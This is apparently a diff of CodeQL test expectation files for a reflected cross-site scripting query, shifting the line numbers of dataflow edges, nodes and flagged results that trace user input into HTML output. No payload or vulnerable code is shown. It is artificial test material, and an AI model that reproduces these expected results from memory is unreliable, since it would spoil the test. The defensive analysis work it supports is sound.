documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
    ' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected index 9e842ab516ed..d4678176df1b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXss.expected @@ -1,41 +1,41 @@ edges -| ReflectedXss.js:8:33:8:45 | req.params.id | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | provenance | | -| ReflectedXss.js:17:31:17:39 | params.id | ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | provenance | | -| ReflectedXss.js:23:19:23:26 | req.body | ReflectedXss.js:23:12:23:27 | marked(req.body) | provenance | | -| ReflectedXss.js:42:31:42:38 | req.body | ReflectedXss.js:42:12:42:39 | convert ... q.body) | provenance | | -| ReflectedXss.js:64:14:64:21 | req.body | ReflectedXss.js:64:39:64:42 | file | provenance | | -| ReflectedXss.js:64:39:64:42 | file | ReflectedXss.js:65:16:65:19 | file | provenance | | -| ReflectedXss.js:68:12:68:41 | remark( ... q.body) | ReflectedXss.js:68:12:68:52 | remark( ... tring() | provenance | | -| ReflectedXss.js:68:33:68:40 | req.body | ReflectedXss.js:68:12:68:41 | remark( ... q.body) | provenance | | -| ReflectedXss.js:72:12:72:56 | unified ... q.body) | ReflectedXss.js:72:12:72:65 | unified ... oString | provenance | | -| ReflectedXss.js:72:48:72:55 | req.body | ReflectedXss.js:72:12:72:56 | unified ... q.body) | provenance | | -| ReflectedXss.js:74:20:74:27 | req.body | ReflectedXss.js:74:34:74:34 | f | provenance | | -| ReflectedXss.js:74:34:74:34 | f | ReflectedXss.js:75:14:75:14 | f | provenance | | -| ReflectedXss.js:84:22:84:29 | req.body | ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | provenance | | -| ReflectedXss.js:85:23:85:30 | req.body | ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | provenance | | -| ReflectedXss.js:98:30:98:37 | req.body | ReflectedXss.js:98:12:98:38 | markdow ... q.body) | provenance | | -| ReflectedXss.js:100:31:100:38 | req.body | ReflectedXss.js:100:12:100:39 | markdow ... q.body) | provenance | | -| ReflectedXss.js:103:76:103:83 | req.body | ReflectedXss.js:103:12:103:84 | markdow ... q.body) | provenance | | -| ReflectedXss.js:114:11:114:41 | queryKeys | ReflectedXss.js:116:18:116:26 | queryKeys | provenance | | -| ReflectedXss.js:114:13:114:27 | keys: queryKeys | ReflectedXss.js:114:11:114:41 | queryKeys | provenance | | -| ReflectedXss.js:116:11:116:45 | keys | ReflectedXss.js:118:50:118:53 | keys | provenance | | -| ReflectedXss.js:116:11:116:45 | keys | ReflectedXss.js:118:58:118:61 | keys | provenance | | -| ReflectedXss.js:116:18:116:26 | queryKeys | ReflectedXss.js:116:11:116:45 | keys | provenance | | -| ReflectedXss.js:116:31:116:45 | paramKeys?.keys | ReflectedXss.js:116:11:116:45 | keys | provenance | | -| ReflectedXss.js:118:11:118:61 | keyArray | ReflectedXss.js:119:25:119:32 | keyArray | provenance | | -| ReflectedXss.js:118:11:118:61 | keyArray [0] | ReflectedXss.js:119:25:119:32 | keyArray [0] | provenance | | -| ReflectedXss.js:118:49:118:54 | [keys] [0] | ReflectedXss.js:118:11:118:61 | keyArray [0] | provenance | | -| ReflectedXss.js:118:50:118:53 | keys | ReflectedXss.js:118:49:118:54 | [keys] [0] | provenance | | -| ReflectedXss.js:118:58:118:61 | keys | ReflectedXss.js:118:11:118:61 | keyArray | provenance | | -| ReflectedXss.js:119:11:119:72 | invalidKeys | ReflectedXss.js:122:33:122:43 | invalidKeys | provenance | | -| ReflectedXss.js:119:11:119:72 | invalidKeys [0] | ReflectedXss.js:122:33:122:43 | invalidKeys [0] | provenance | | -| ReflectedXss.js:119:25:119:32 | keyArray | ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | provenance | | -| ReflectedXss.js:119:25:119:32 | keyArray [0] | ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | provenance | | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | ReflectedXss.js:119:11:119:72 | invalidKeys | provenance | | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | ReflectedXss.js:119:11:119:72 | invalidKeys [0] | provenance | | -| ReflectedXss.js:122:33:122:43 | invalidKeys | ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | provenance | | -| ReflectedXss.js:122:33:122:43 | invalidKeys [0] | ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | provenance | | -| ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | provenance | | +| ReflectedXss.js:7:33:7:45 | req.params.id | ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | provenance | | +| ReflectedXss.js:16:31:16:39 | params.id | ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | provenance | | +| ReflectedXss.js:22:19:22:26 | req.body | ReflectedXss.js:22:12:22:27 | marked(req.body) | provenance | | +| ReflectedXss.js:41:31:41:38 | req.body | ReflectedXss.js:41:12:41:39 | convert ... q.body) | provenance | | +| ReflectedXss.js:63:14:63:21 | req.body | ReflectedXss.js:63:39:63:42 | file | provenance | | +| ReflectedXss.js:63:39:63:42 | file | ReflectedXss.js:64:16:64:19 | file | provenance | | +| ReflectedXss.js:67:12:67:41 | remark( ... q.body) | ReflectedXss.js:67:12:67:52 | remark( ... tring() | provenance | | +| ReflectedXss.js:67:33:67:40 | req.body | ReflectedXss.js:67:12:67:41 | remark( ... q.body) | provenance | | +| ReflectedXss.js:71:12:71:56 | unified ... q.body) | ReflectedXss.js:71:12:71:65 | unified ... oString | provenance | | +| ReflectedXss.js:71:48:71:55 | req.body | ReflectedXss.js:71:12:71:56 | unified ... q.body) | provenance | | +| ReflectedXss.js:73:20:73:27 | req.body | ReflectedXss.js:73:34:73:34 | f | provenance | | +| ReflectedXss.js:73:34:73:34 | f | ReflectedXss.js:74:14:74:14 | f | provenance | | +| ReflectedXss.js:83:22:83:29 | req.body | ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | provenance | | +| ReflectedXss.js:84:23:84:30 | req.body | ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | provenance | | +| ReflectedXss.js:97:30:97:37 | req.body | ReflectedXss.js:97:12:97:38 | markdow ... q.body) | provenance | | +| ReflectedXss.js:99:31:99:38 | req.body | ReflectedXss.js:99:12:99:39 | markdow ... q.body) | provenance | | +| ReflectedXss.js:102:76:102:83 | req.body | ReflectedXss.js:102:12:102:84 | markdow ... q.body) | provenance | | +| ReflectedXss.js:113:11:113:41 | queryKeys | ReflectedXss.js:115:18:115:26 | queryKeys | provenance | | +| ReflectedXss.js:113:13:113:27 | keys: queryKeys | ReflectedXss.js:113:11:113:41 | queryKeys | provenance | | +| ReflectedXss.js:115:11:115:45 | keys | ReflectedXss.js:117:50:117:53 | keys | provenance | | +| ReflectedXss.js:115:11:115:45 | keys | ReflectedXss.js:117:58:117:61 | keys | provenance | | +| ReflectedXss.js:115:18:115:26 | queryKeys | ReflectedXss.js:115:11:115:45 | keys | provenance | | +| ReflectedXss.js:115:31:115:45 | paramKeys?.keys | ReflectedXss.js:115:11:115:45 | keys | provenance | | +| ReflectedXss.js:117:11:117:61 | keyArray | ReflectedXss.js:118:25:118:32 | keyArray | provenance | | +| ReflectedXss.js:117:11:117:61 | keyArray [0] | ReflectedXss.js:118:25:118:32 | keyArray [0] | provenance | | +| ReflectedXss.js:117:49:117:54 | [keys] [0] | ReflectedXss.js:117:11:117:61 | keyArray [0] | provenance | | +| ReflectedXss.js:117:50:117:53 | keys | ReflectedXss.js:117:49:117:54 | [keys] [0] | provenance | | +| ReflectedXss.js:117:58:117:61 | keys | ReflectedXss.js:117:11:117:61 | keyArray | provenance | | +| ReflectedXss.js:118:11:118:72 | invalidKeys | ReflectedXss.js:121:33:121:43 | invalidKeys | provenance | | +| ReflectedXss.js:118:11:118:72 | invalidKeys [0] | ReflectedXss.js:121:33:121:43 | invalidKeys [0] | provenance | | +| ReflectedXss.js:118:25:118:32 | keyArray | ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | provenance | | +| ReflectedXss.js:118:25:118:32 | keyArray [0] | ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | provenance | | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | ReflectedXss.js:118:11:118:72 | invalidKeys | provenance | | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | ReflectedXss.js:118:11:118:72 | invalidKeys [0] | provenance | | +| ReflectedXss.js:121:33:121:43 | invalidKeys | ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | provenance | | +| ReflectedXss.js:121:33:121:43 | invalidKeys [0] | ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | provenance | | +| ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | provenance | | | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | provenance | | | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | provenance | | | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | provenance | | @@ -144,63 +144,63 @@ edges | tst3.js:11:16:11:74 | prettie ... bel" }) | tst3.js:11:9:11:74 | code | provenance | | | tst3.js:11:32:11:39 | reg.body | tst3.js:11:16:11:74 | prettie ... bel" }) | provenance | | nodes -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | -| ReflectedXss.js:8:33:8:45 | req.params.id | semmle.label | req.params.id | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | -| ReflectedXss.js:17:31:17:39 | params.id | semmle.label | params.id | -| ReflectedXss.js:22:12:22:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | semmle.label | marked(req.body) | -| ReflectedXss.js:23:19:23:26 | req.body | semmle.label | req.body | -| ReflectedXss.js:29:12:29:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:41:12:41:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | semmle.label | convert ... q.body) | -| ReflectedXss.js:42:31:42:38 | req.body | semmle.label | req.body | -| ReflectedXss.js:56:12:56:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:64:14:64:21 | req.body | semmle.label | req.body | -| ReflectedXss.js:64:39:64:42 | file | semmle.label | file | -| ReflectedXss.js:65:16:65:19 | file | semmle.label | file | -| ReflectedXss.js:68:12:68:41 | remark( ... q.body) | semmle.label | remark( ... q.body) | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | semmle.label | remark( ... tring() | -| ReflectedXss.js:68:33:68:40 | req.body | semmle.label | req.body | -| ReflectedXss.js:72:12:72:56 | unified ... q.body) | semmle.label | unified ... q.body) | -| ReflectedXss.js:72:12:72:65 | unified ... oString | semmle.label | unified ... oString | -| ReflectedXss.js:72:48:72:55 | req.body | semmle.label | req.body | -| ReflectedXss.js:74:20:74:27 | req.body | semmle.label | req.body | -| ReflectedXss.js:74:34:74:34 | f | semmle.label | f | -| ReflectedXss.js:75:14:75:14 | f | semmle.label | f | -| ReflectedXss.js:83:12:83:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | semmle.label | snarkdown(req.body) | -| ReflectedXss.js:84:22:84:29 | req.body | semmle.label | req.body | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | semmle.label | snarkdown2(req.body) | -| ReflectedXss.js:85:23:85:30 | req.body | semmle.label | req.body | -| ReflectedXss.js:97:12:97:19 | req.body | semmle.label | req.body | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:98:30:98:37 | req.body | semmle.label | req.body | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:100:31:100:38 | req.body | semmle.label | req.body | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | semmle.label | markdow ... q.body) | -| ReflectedXss.js:103:76:103:83 | req.body | semmle.label | req.body | -| ReflectedXss.js:110:16:110:30 | request.query.p | semmle.label | request.query.p | -| ReflectedXss.js:114:11:114:41 | queryKeys | semmle.label | queryKeys | -| ReflectedXss.js:114:13:114:27 | keys: queryKeys | semmle.label | keys: queryKeys | -| ReflectedXss.js:116:11:116:45 | keys | semmle.label | keys | -| ReflectedXss.js:116:18:116:26 | queryKeys | semmle.label | queryKeys | -| ReflectedXss.js:116:31:116:45 | paramKeys?.keys | semmle.label | paramKeys?.keys | -| ReflectedXss.js:118:11:118:61 | keyArray | semmle.label | keyArray | -| ReflectedXss.js:118:11:118:61 | keyArray [0] | semmle.label | keyArray [0] | -| ReflectedXss.js:118:49:118:54 | [keys] [0] | semmle.label | [keys] [0] | -| ReflectedXss.js:118:50:118:53 | keys | semmle.label | keys | -| ReflectedXss.js:118:58:118:61 | keys | semmle.label | keys | -| ReflectedXss.js:119:11:119:72 | invalidKeys | semmle.label | invalidKeys | -| ReflectedXss.js:119:11:119:72 | invalidKeys [0] | semmle.label | invalidKeys [0] | -| ReflectedXss.js:119:25:119:32 | keyArray | semmle.label | keyArray | -| ReflectedXss.js:119:25:119:32 | keyArray [0] | semmle.label | keyArray [0] | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) | semmle.label | keyArra ... s(key)) | -| ReflectedXss.js:119:25:119:72 | keyArra ... s(key)) [0] | semmle.label | keyArra ... s(key)) [0] | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | semmle.label | `${inva ... telist` | -| ReflectedXss.js:122:33:122:43 | invalidKeys | semmle.label | invalidKeys | -| ReflectedXss.js:122:33:122:43 | invalidKeys [0] | semmle.label | invalidKeys [0] | -| ReflectedXss.js:122:33:122:54 | invalid ... n(', ') | semmle.label | invalid ... n(', ') | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | +| ReflectedXss.js:7:33:7:45 | req.params.id | semmle.label | req.params.id | +| ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | semmle.label | "Unknow ... rams.id | +| ReflectedXss.js:16:31:16:39 | params.id | semmle.label | params.id | +| ReflectedXss.js:21:12:21:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | semmle.label | marked(req.body) | +| ReflectedXss.js:22:19:22:26 | req.body | semmle.label | req.body | +| ReflectedXss.js:28:12:28:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:40:12:40:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | semmle.label | convert ... q.body) | +| ReflectedXss.js:41:31:41:38 | req.body | semmle.label | req.body | +| ReflectedXss.js:55:12:55:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:63:14:63:21 | req.body | semmle.label | req.body | +| ReflectedXss.js:63:39:63:42 | file | semmle.label | file | +| ReflectedXss.js:64:16:64:19 | file | semmle.label | file | +| ReflectedXss.js:67:12:67:41 | remark( ... q.body) | semmle.label | remark( ... q.body) | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | semmle.label | remark( ... tring() | +| ReflectedXss.js:67:33:67:40 | req.body | semmle.label | req.body | +| ReflectedXss.js:71:12:71:56 | unified ... q.body) | semmle.label | unified ... q.body) | +| ReflectedXss.js:71:12:71:65 | unified ... oString | semmle.label | unified ... oString | +| ReflectedXss.js:71:48:71:55 | req.body | semmle.label | req.body | +| ReflectedXss.js:73:20:73:27 | req.body | semmle.label | req.body | +| ReflectedXss.js:73:34:73:34 | f | semmle.label | f | +| ReflectedXss.js:74:14:74:14 | f | semmle.label | f | +| ReflectedXss.js:82:12:82:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | semmle.label | snarkdown(req.body) | +| ReflectedXss.js:83:22:83:29 | req.body | semmle.label | req.body | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | semmle.label | snarkdown2(req.body) | +| ReflectedXss.js:84:23:84:30 | req.body | semmle.label | req.body | +| ReflectedXss.js:96:12:96:19 | req.body | semmle.label | req.body | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:97:30:97:37 | req.body | semmle.label | req.body | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:99:31:99:38 | req.body | semmle.label | req.body | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | semmle.label | markdow ... q.body) | +| ReflectedXss.js:102:76:102:83 | req.body | semmle.label | req.body | +| ReflectedXss.js:109:16:109:30 | request.query.p | semmle.label | request.query.p | +| ReflectedXss.js:113:11:113:41 | queryKeys | semmle.label | queryKeys | +| ReflectedXss.js:113:13:113:27 | keys: queryKeys | semmle.label | keys: queryKeys | +| ReflectedXss.js:115:11:115:45 | keys | semmle.label | keys | +| ReflectedXss.js:115:18:115:26 | queryKeys | semmle.label | queryKeys | +| ReflectedXss.js:115:31:115:45 | paramKeys?.keys | semmle.label | paramKeys?.keys | +| ReflectedXss.js:117:11:117:61 | keyArray | semmle.label | keyArray | +| ReflectedXss.js:117:11:117:61 | keyArray [0] | semmle.label | keyArray [0] | +| ReflectedXss.js:117:49:117:54 | [keys] [0] | semmle.label | [keys] [0] | +| ReflectedXss.js:117:50:117:53 | keys | semmle.label | keys | +| ReflectedXss.js:117:58:117:61 | keys | semmle.label | keys | +| ReflectedXss.js:118:11:118:72 | invalidKeys | semmle.label | invalidKeys | +| ReflectedXss.js:118:11:118:72 | invalidKeys [0] | semmle.label | invalidKeys [0] | +| ReflectedXss.js:118:25:118:32 | keyArray | semmle.label | keyArray | +| ReflectedXss.js:118:25:118:32 | keyArray [0] | semmle.label | keyArray [0] | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) | semmle.label | keyArra ... s(key)) | +| ReflectedXss.js:118:25:118:72 | keyArra ... s(key)) [0] | semmle.label | keyArra ... s(key)) [0] | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | semmle.label | `${inva ... telist` | +| ReflectedXss.js:121:33:121:43 | invalidKeys | semmle.label | invalidKeys | +| ReflectedXss.js:121:33:121:43 | invalidKeys [0] | semmle.label | invalidKeys [0] | +| ReflectedXss.js:121:33:121:54 | invalid ... n(', ') | semmle.label | invalid ... n(', ') | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | semmle.label | "FOO: " ... rams.id | | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | semmle.label | req.params.id | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | semmle.label | "FOO: " ... rams.id | @@ -335,28 +335,28 @@ nodes subpaths | ReflectedXssGood3.js:139:24:139:26 | url | ReflectedXssGood3.js:68:22:68:26 | value | ReflectedXssGood3.js:108:10:108:23 | parts.join('') | ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | #select -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | ReflectedXss.js:8:33:8:45 | req.params.id | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | ReflectedXss.js:17:31:17:39 | params.id | ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:17:31:17:39 | params.id | user-provided value | -| ReflectedXss.js:22:12:22:19 | req.body | ReflectedXss.js:22:12:22:19 | req.body | ReflectedXss.js:22:12:22:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:22:12:22:19 | req.body | user-provided value | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | ReflectedXss.js:23:19:23:26 | req.body | ReflectedXss.js:23:12:23:27 | marked(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:23:19:23:26 | req.body | user-provided value | -| ReflectedXss.js:29:12:29:19 | req.body | ReflectedXss.js:29:12:29:19 | req.body | ReflectedXss.js:29:12:29:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:29:12:29:19 | req.body | user-provided value | -| ReflectedXss.js:41:12:41:19 | req.body | ReflectedXss.js:41:12:41:19 | req.body | ReflectedXss.js:41:12:41:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:41:12:41:19 | req.body | user-provided value | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | ReflectedXss.js:42:31:42:38 | req.body | ReflectedXss.js:42:12:42:39 | convert ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:42:31:42:38 | req.body | user-provided value | -| ReflectedXss.js:56:12:56:19 | req.body | ReflectedXss.js:56:12:56:19 | req.body | ReflectedXss.js:56:12:56:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:56:12:56:19 | req.body | user-provided value | -| ReflectedXss.js:65:16:65:19 | file | ReflectedXss.js:64:14:64:21 | req.body | ReflectedXss.js:65:16:65:19 | file | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:64:14:64:21 | req.body | user-provided value | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | ReflectedXss.js:68:33:68:40 | req.body | ReflectedXss.js:68:12:68:52 | remark( ... tring() | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:68:33:68:40 | req.body | user-provided value | -| ReflectedXss.js:72:12:72:65 | unified ... oString | ReflectedXss.js:72:48:72:55 | req.body | ReflectedXss.js:72:12:72:65 | unified ... oString | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:72:48:72:55 | req.body | user-provided value | -| ReflectedXss.js:75:14:75:14 | f | ReflectedXss.js:74:20:74:27 | req.body | ReflectedXss.js:75:14:75:14 | f | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:74:20:74:27 | req.body | user-provided value | -| ReflectedXss.js:83:12:83:19 | req.body | ReflectedXss.js:83:12:83:19 | req.body | ReflectedXss.js:83:12:83:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:83:12:83:19 | req.body | user-provided value | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | ReflectedXss.js:84:22:84:29 | req.body | ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:84:22:84:29 | req.body | user-provided value | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | ReflectedXss.js:85:23:85:30 | req.body | ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:85:23:85:30 | req.body | user-provided value | -| ReflectedXss.js:97:12:97:19 | req.body | ReflectedXss.js:97:12:97:19 | req.body | ReflectedXss.js:97:12:97:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:97:12:97:19 | req.body | user-provided value | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | ReflectedXss.js:98:30:98:37 | req.body | ReflectedXss.js:98:12:98:38 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:98:30:98:37 | req.body | user-provided value | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | ReflectedXss.js:100:31:100:38 | req.body | ReflectedXss.js:100:12:100:39 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:100:31:100:38 | req.body | user-provided value | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | ReflectedXss.js:103:76:103:83 | req.body | ReflectedXss.js:103:12:103:84 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:103:76:103:83 | req.body | user-provided value | -| ReflectedXss.js:110:16:110:30 | request.query.p | ReflectedXss.js:110:16:110:30 | request.query.p | ReflectedXss.js:110:16:110:30 | request.query.p | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:110:16:110:30 | request.query.p | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | ReflectedXss.js:114:13:114:27 | keys: queryKeys | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:114:13:114:27 | keys: queryKeys | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | user-provided value | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | ReflectedXss.js:7:33:7:45 | req.params.id | ReflectedXss.js:7:14:7:45 | "Unknow ... 